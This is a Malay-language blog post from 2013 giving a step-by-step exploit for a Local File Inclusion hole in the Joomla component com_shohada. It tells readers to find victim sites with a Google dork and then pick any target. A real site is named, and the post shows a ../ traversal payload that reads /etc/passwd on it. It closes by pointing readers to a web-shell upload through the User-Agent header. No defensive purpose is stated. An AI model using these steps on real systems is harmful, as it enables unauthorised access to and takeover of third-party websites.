Sunday, 2 June 2013
Entry hari ini aku nak share exploit joomla component com_shohada. component joomla ini terdedah kepada serangan Local File Inclusion atau LFI.
1. Mula-mula cari website sasaran dengan google dork.(copy dan paste dekat google).
Dork : inurl:com_shohada
2. Kemudian pilih mana2 website yang korang nak.
Ok aku dah dapat satu website :
http://gorgab.com/index.php?option=com_shohada&view=shohada
3. Sekarang gantikan url laman web korang tu dengan :
index.php?option=com_shohada&controller=
Jadi website tadi akan jadi :
http://gorgab.com/index.php?option=com_shohada&controller=
4. Sekarang masa untuk kita serang guna LFI.
Tempat korang nak serang tu :
http://gorgab.com/index.php?option=com_shohada&controller=[LFI DI SINI]
Kemudian masukkan exploit :
http://gorgab.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd
Tengok yang BIRU tu exploit LFI.kalau tak jadi, buang dihujung tu.Kalau tak jadi jugak maksudnya web tu tak vulnerable.
Rujuk gambar :
Ni maksudnya website tu vulnerable! Sekarang korang boleh lah upload shell guna User-Agent.
Tutorial upload shell LFI tengok di sini :
Sumber dari Reaperz
